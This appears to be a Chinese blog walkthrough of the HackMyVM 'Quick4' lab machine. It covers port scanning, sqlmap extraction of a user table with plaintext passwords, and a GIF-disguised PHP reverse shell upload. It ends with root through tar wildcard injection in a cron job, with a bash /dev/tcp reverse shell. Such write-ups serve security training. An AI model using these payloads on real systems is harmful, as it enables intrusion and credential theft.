HakcMyVM-Quick4
张开发
• 2026/4/16 2:54:38 • 15 分钟阅读 最新文章
-
别再对着I2C设备发愁了!用i2ctools(i2cdetect/dump/get/set)5分钟搞定硬件调试
2026/4/16 4:44:18
-
为什么92%的AI团队还在为多模态推理支付“智商税”?——4个被忽视的硬件-算法协同优化盲区
2026/4/16 4:41:44
-
开发者如何平衡深度与广度?技能树优化法
2026/4/16 4:38:36
-
12.4-从零构建Qt日志系统:Log4Qt模块化集成与实战配置指南
2026/4/16 4:37:12
-
ArcToobox自定义工具箱加载方法
2026/4/16 4:33:46
-
Ada编程避坑指南:强类型系统下的常见错误与解决方案
2026/4/16 4:33:46
5分钟搞定硬件调试)
推荐文章
-
在Windows系统安装Docker
2026/4/15 18:12:39
-
HagiCode Desktop 混合分发架构解析:如何用 PP 加速大文件下载籽
2026/4/15 18:12:38
-
TensorRT安装避坑指南:解决‘cuda_runtime_api.h not found’等常见错误
2026/4/14 18:28:27
-
WindowsCleaner终极指南:3步解决C盘爆红,让Windows系统重获新生
2026/4/15 18:12:42
-
告别TF卡!手把手教你给ROCK5B的SPI Nor Flash刷入NVMe启动引导(附固件包)
2026/4/15 12:37:25
-
鱿鱼视频小说网站模板源码:快速搭建双模式资源站,轻松开启运营之路
2026/4/14 18:29:17
)
相关文章
-
钢坯火焰清理机设计【开题报告+任务书+毕业论文+CAD图纸+翻译】
2026/4/15 3:23:47
-
15 | Claude Code Hooks 事件驱动自动化:防微杜渐的安全防线
2026/4/14 18:41:18
-
Linux党福利:Debian12下用VSCode+SDCC玩转51单片机(含WSL配置指南)
2026/4/15 4:51:57
-
从微调到精控:可变电阻在音频电路中的深度应用解析
2026/4/15 15:11:01
-
Mahony、互补滤波与卡尔曼:给嵌入式新手的六轴姿态融合算法选型指南
2026/4/15 18:12:41
-
保姆级教程:在WSL2的Ubuntu 22.04上,用CUDA 12.9编译运行llama.cpp(含模型下载避坑指南)
2026/4/15 18:12:46
)
)
分享文章
信息搜集主机发现┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.2.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-15 03:19 EDT Nmap scan report for quick4 (192.168.2.9) Host is up (0.00028s latency). MAC Address: 08:00:27:AA:84:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap scan report for kali (192.168.2.15) Host is up. Nmap done: 256 IP addresses (7 hosts up) scanned in 43.54 seconds端口扫描┌──(kali㉿kali)-[~] └─$ nmap -sV -p- 192.168.2.9 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-15 03:21 EDT Nmap scan report for quick4 (192.168.2.9) Host is up (0.00057s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) MAC Address: 08:00:27:AA:84:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds漏洞利用目录枚举┌──(kali㉿kali)-[~] └─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.2.9 Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.2.9 [] Method: GET [] Threads: 10 [] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.6 [] Extensions: html,php,txt,jpg,png,zip,git [] Timeout: 10s Starting gobuster in directory enumeration mode /.php (Status: 403) [Size: 276] /images (Status: 301) [Size: 311] [-- http://192.168.2.9/images/] /index.html (Status: 200) [Size: 51414] /.html (Status: 403) [Size: 276] /img (Status: 301) [Size: 308] [-- http://192.168.2.9/img/] /modules (Status: 301) [Size: 312] [-- http://192.168.2.9/modules/] /careers (Status: 301) [Size: 312] [-- http://192.168.2.9/careers/] /css (Status: 301) [Size: 308] [-- http://192.168.2.9/css/] /lib (Status: 301) [Size: 308] [-- http://192.168.2.9/lib/] /js (Status: 301) [Size: 307] [-- http://192.168.2.9/js/] /customer (Status: 301) [Size: 313] [-- http://192.168.2.9/customer/] /404.html (Status: 200) [Size: 5014] /robots.txt (Status: 200) [Size: 32] /fonts (Status: 301) [Size: 310] [-- http://192.168.2.9/fonts/] /employee (Status: 301) [Size: 313] [-- http://192.168.2.9/employee/] /.php (Status: 403) [Size: 276] /.html (Status: 403) [Size: 276] /server-status (Status: 403) [Size: 276] /logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 276] Progress: 9482032 / 9482040 (100.00%) Finished 看一下/robots.txt┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.9/robots.txt User-agent: * Disallow: /admin//admin是404/employee得到一个登陆页面尝试一下SQL注入┌──(kali㉿kali)-[~] └─$ sqlmap -r sql --batch --dbs available databases [5]: [*] quick [*] information_schema [*] mysql [*] performance_schema [*] sys ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql --batch -D quick --tables Database: quick [2 tables] ------- | cars | | users | ------- ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql --batch -D quick -T cars --dump Database: quick Table: cars [4 entries] ---------------------------------------------------- | id | user_id | brand | type | year | license_plate | ---------------------------------------------------- | 1 | 4 | Ford | Mustang | 1963 | ABC123 | | 2 | 6 | Honda | Civic | 2012 | DEF456 | | 3 | 7 | Mazda | mx5 | 2004 | GHIJ56 | | 4 | 8 | Dodge | RAM1000 | 2020 | KLM789 | ---------------------------------------------------- ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql -D quick -T users --columns --batch Database: quick Table: users [6 columns] ------------------------------------------------------ | Column | Type | ------------------------------------------------------ | name | varchar(255) | | role | enum(admin,employee,customer) | | email | varchar(255) | | id | int | | password | varchar(255) | | profile_picture | varchar(255) | ------------------------------------------------------ ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql -D quick -T users -C email,password,role --dump --threads10 --batch Database: quick Table: users [28 entries] ----------------------------------------------------------------- | email | role | password | ----------------------------------------------------------------- | a.luckyemail.hmv | customer | c1P35bcdw0mF3ExJXG | | andrew.speedquick.hmv | employee | o30VfVgts73ibSboUP | | b.clintwoodemail.hmv | customer | 2yLw53N0m08OhFyBXx | | coos.bustersquick.hmv | employee | f1CD3u3XVo0uXumGah | | d.trumpetemail.hmv | customer | f64KBw7cGvu1BkVwcb | | dick_swettemail.hmv | customer | y6KA4378EbK0ePv5XN | | frankemail.hmv | customer | 155HseB7sQzIpE2dIG | | fred.flinstoneemail.hmv | customer | qM51130xeGHHxKZWqk | | infoquick.hmv | admin | Qe62W064sgRTdxAEpr | | j.bondemail.hmv | customer | 7wS93MQPiVQUkqfQ5T | | j.danielsemail.hmv | customer | yF891teFhjhj0Rg7ds | | j.doeemail.hmv | customer | 0i3a8KyWS2IcbmqF02 | | jack.blackemail.hmv | customer | 1Wd35lRnAKMGMEwcsX | | jane_smithemail.hmv | customer | pL2a92Po2ykXytzX7y | | jeff.andersonquick.hmv | employee | 5dX3g8hnKo7AFNHXTV | | john.smithquick.hmv | employee | 5Wqio90BLd7i4oBMXJ | | juan.mecanicoquick.hmv | employee | 5a34pXYDAOUMZCoPrg | | k.ballemail.hmv | customer | k1TI68MmYu8uQHhfS1 | | lara.johnsonquick.hmv | employee | 5Y7zypv8tl9N7TeCFp | | laura.johnsonemail.hmv | customer | 95T3OmjOV3gublmR7Z | | lee.ka-shingnquick.hmvquick.hmv | employee | am636X6Rh1u6S8WNr4 | | m.monroeemail.hmv | customer | f64KBw7cGvu1BkVwcb | | mike.cooperquick.hmv | employee | Rh978db3URen64yaPP | | misty.cuppemail.hmv | customer | c1P35bcdw0mF3ExJXG | | n.downemail.hmv | customer | Lj9Wr562vqNuLlkTr0 | | nick.greenhornquick.hmv | employee | C3ho049g4kwxTxuSUA | | s.hutsonemail.hmv | customer | sF217VruHNj6wbjofU | | t.greenemail.hmv | customer | 7zQ19L0HhFsivH3zFi | -----------------------------------------------------------------用admin权限账号infoquick.hmv成功登录进后台发现可以上传头像文件尝试上传一个反弹shell?php $sockfsockopen(192.168.2.15,4444);$procproc_open(sh, array(0$sock, 1$sock, 2$sock),$pipes); ?抓包以后在前面添加一个GIF8;伪装成图片GIF8; ?php $sockfsockopen(192.168.2.15,4444);$procproc_open(sh, array(0$sock, 1$sock, 2$sock),$pipes); ?它是上传到了nick用户我们切换过去┌──(kali㉿kali)-[~] └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.2.15] from (UNKNOWN) [192.168.2.9] 49508 id uid33(www-data) gid33(www-data) groups33(www-data)权限提升script /dev/null -c bash Script started, output log file is /dev/null. www-dataquick4:/var/www/html/employee/uploads$ id id uid33(www-data) gid33(www-data) groups33(www-data) www-dataquick4:/var/www/html/employee/uploads$ sudo -l sudo -l [sudo] password for www-data: www-dataquick4:/var/www/html/employee$ find / -perm -4000 -type f 2/dev/null ml/employee$ find / -perm -4000 -type f 2/dev/null /snap/snapd/19457/usr/lib/snapd/snap-confine /snap/snapd/20671/usr/lib/snapd/snap-confine /snap/core20/1974/usr/bin/chfn /snap/core20/1974/usr/bin/chsh /snap/core20/1974/usr/bin/gpasswd /snap/core20/1974/usr/bin/mount /snap/core20/1974/usr/bin/newgrp /snap/core20/1974/usr/bin/passwd /snap/core20/1974/usr/bin/su /snap/core20/1974/usr/bin/sudo /snap/core20/1974/usr/bin/umount /snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/1974/usr/lib/openssh/ssh-keysign /snap/core20/2105/usr/bin/chfn /snap/core20/2105/usr/bin/chsh /snap/core20/2105/usr/bin/gpasswd /snap/core20/2105/usr/bin/mount /snap/core20/2105/usr/bin/newgrp /snap/core20/2105/usr/bin/passwd /snap/core20/2105/usr/bin/su /snap/core20/2105/usr/bin/sudo /snap/core20/2105/usr/bin/umount /snap/core20/2105/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/2105/usr/lib/openssh/ssh-keysign /usr/libexec/polkit-agent-helper-1 /usr/bin/sudo /usr/bin/pkexec /usr/bin/passwd /usr/bin/fusermount3 /usr/bin/chfn /usr/bin/mount /usr/bin/su /usr/bin/chsh /usr/bin/umount /usr/bin/newgrp /usr/bin/gpasswd /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign www-dataquick4:/var/www/html/employee$ getcap -r / 2/dev/null getcap -r / 2/dev/null /snap/core20/1974/usr/bin/ping cap_net_rawep /snap/core20/2105/usr/bin/ping cap_net_rawep /usr/bin/ping cap_net_rawep /usr/bin/mtr-packet cap_net_rawep /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_adminep //发现每分钟执行一次/usr/local/bin/backup.sh www-dataquick4:/var/www/html/employee$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you dont have to run the crontab # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL/bin/sh # You can also override PATH, but by default, newer versions inherit it from the environment #PATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */1 * * * * root /usr/local/bin/backup.sh 17 * * * * root cd / run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.monthly ) # www-dataquick4:/var/www/html/employee$ ls -la /usr/local/bin/backup.sh ls -la /usr/local/bin/backup.sh -rwxr--r-- 1 root root 75 Feb 12 2024 /usr/local/bin/backup.sh //tar使用通配符文件名被当成tar参数解析 www-dataquick4:/var/www/html/employee$ cat /usr/local/bin/backup.sh cat /usr/local/bin/backup.sh #!/bin/bash cd /var/www/html/ tar czf /var/backups/backup-website.tar.gz * www-dataquick4:/var/www/html/employee$ cd /var/www/html/ cd /var/www/html/ //创建恶意文件 www-dataquick4:/var/www/html$ touch -- --checkpoint1 touch -- --checkpoint1 www-dataquick4:/var/www/html$ touch -- --checkpoint-actionexecbash shell.sh $ touch -- --checkpoint-actionexecbash shell.sh //写入反弹shell www-dataquick4:/var/www/html$ echo bash -i /dev/tcp/192.168.2.15/1234 01 shell.sh h -i /dev/tcp/192.168.2.15/1234 01 shell.sh www-dataquick4:/var/www/html$ chmod x shell.sh chmod x shell.sh //执行时会变为tar czf ... --checkpoint1 --checkpoint-actionexecbash shell.sh * ┌──(kali㉿kali)-[~] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.2.15] from (UNKNOWN) [192.168.2.9] 33590 bash: cannot set terminal process group (61796): Inappropriate ioctl for device bash: no job control in this shell rootquick4:/var/www/html# id id uid0(root) gid0(root) groups0(root)
更多文章
前端开发 2026/4/16 2:52:37
朱雀AI检测率高怎么降?保姆级攻略:用嘎嘎降AI从56%降到0%
朱雀AI检测率高怎么降?保姆级攻略:用嘎嘎降AI从56%降到0% 最近好几个同学私信问我:论文交上去之前自己查了一下朱雀,AI检测率直接显示56%,心态都崩了。 别慌。56%看着吓人,但只要方法对,降到学校…
张开发 
前端开发 2026/4/16 2:50:19
iOS开发必备:Certificates、Identifiers与Profiles全解析
1. 证书(Certificates)全解析 刚接触iOS开发时,最让我头疼的就是证书系统。每次看到"Code Signing Error"的红色报错,都恨不得砸键盘。后来才发现,只要搞懂Certificates的运作逻辑,这些报错都能轻…
张开发 
前端开发 2026/4/16 2:50:19
别再为显存发愁了:用vLLM 0.6.3在单张3090上部署Qwen2-VL-7B的保姆级调参指南
单卡3090极限调优:Qwen2-VL-7B视觉语言模型高效部署实战手册 当24GB显存遇上70亿参数的视觉语言模型,这场"内存捉襟见肘"的战役该如何打赢?本文将揭示如何通过vLLM 0.6.3的精细调参,让Qwen2-VL-7B在单张RTX 3090上流畅运…
张开发 
前端开发 2026/4/16 2:46:17
GEE实战:基于Landsat8的MNDWI水体提取与城镇环境分析
1. 认识MNDWI:比NDWI更懂城市的水体检索术 第一次用NDWI做水体提取时,我盯着结果图里大片"假水体"直挠头——城市建筑阴影和真实水面在影像上几乎无法区分。直到发现MNDWI(改进的归一化差异水体指数),这个问…
张开发 
前端开发 2026/4/16 2:42:15
从拆解到参数解读:深度剖析B系列高压模块的电路设计奥秘
从拆解到参数解读:深度剖析B系列高压模块的电路设计奥秘 在电源设计领域,高压模块一直是工程师们关注的焦点。B系列高压模块以其紧凑的尺寸、高效的性能和稳定的输出,成为众多应用场景中的首选。本文将带领读者深入探索这款模块的设计精髓&am…
张开发 
前端开发 2026/4/16 2:40:12
软件多态管理化的接口统一与实现多样
软件多态管理化的接口统一与实现多样 在软件开发中,多态性是一种强大的设计理念,它允许开发者通过统一的接口管理不同的实现,从而提高代码的灵活性和可维护性。多态管理化不仅简化了系统架构,还支持功能的动态扩展,是…
张开发 
前端开发 2026/4/16 2:32:26
VS Code 快速生成 Vue3 组件模板的实用技巧
1. 为什么你需要Vue3组件模板 每次新建Vue组件都要重复写<template>、<script setup>和<style>这些基础结构?作为一个从Vue2转到Vue3的老手,我深刻理解这种重复劳动的痛苦。特别是在大型项目中,每天可能要创建十几个组件&…
张开发 
前端开发 2026/4/16 2:32:20
快速解决外汇实时api接口异常问题
上周在处理一个外汇交易项目时,我发现WebSocket订阅的tick数据断断续续,几个关键价格点完全没收到。查日志才发现,问题不在网络,而是订阅确认和心跳没处理好。在高频交易环境下,外汇实时api稍有疏忽就会漏掉重要tick&a…
张开发 
前端开发 2026/4/16 2:31:13
ORA-12514:TNS:listener does not currently know of service requested in connect descriptor 问题处理记录
昨天连接本地oracle数据库时突然连不上了,使用navicat打开之前一直正常的数据库连接时弹出报错:ORA-12514:TNS:listener does not currently know of service requested in connect descriptor然后百度了该问题的解决办法,都试了一…
张开发 
前端开发 2026/4/16 2:22:27
D455+VINS-Fusion+Octomap:从点云到八叉树栅格地图的完整实现
1. 从零搭建D455VINS-FusionOctomap建图系统 第一次接触三维建图的朋友可能会被各种专业术语吓到,其实这套系统就像搭积木一样简单。D455深度相机负责采集环境数据,VINS-Fusion像导航员一样计算相机运动轨迹,Octomap则把零散的点云数据整理成…
张开发 )
前端开发 2026/4/16 2:22:27
全球仅7家头部AI Lab公开的多模态标注流水线黄金分层架构:感知层→对齐层→推理层→反馈层(含Latency/Quality/Fairness三维监控看板)
第一章:多模态大模型数据标注流水线的演进逻辑与范式跃迁 2026奇点智能技术大会(https://ml-summit.org) 多模态大模型的数据标注已从单模态人工标注的“孤岛式作业”,逐步演进为融合语义对齐、跨模态一致性约束与人机协同反馈闭环的系统性工程。这一跃…
张开发 
前端开发 2026/4/16 2:16:15
novel-downloader:如何轻松下载全网小说?多平台小说下载终极指南
novel-downloader:如何轻松下载全网小说?多平台小说下载终极指南 【免费下载链接】novel-downloader 一个可扩展的通用型小说下载器。 项目地址: https://gitcode.com/gh_mirrors/no/novel-downloader 你是否曾因网络不稳定而无法追更心爱的小说&…
张开发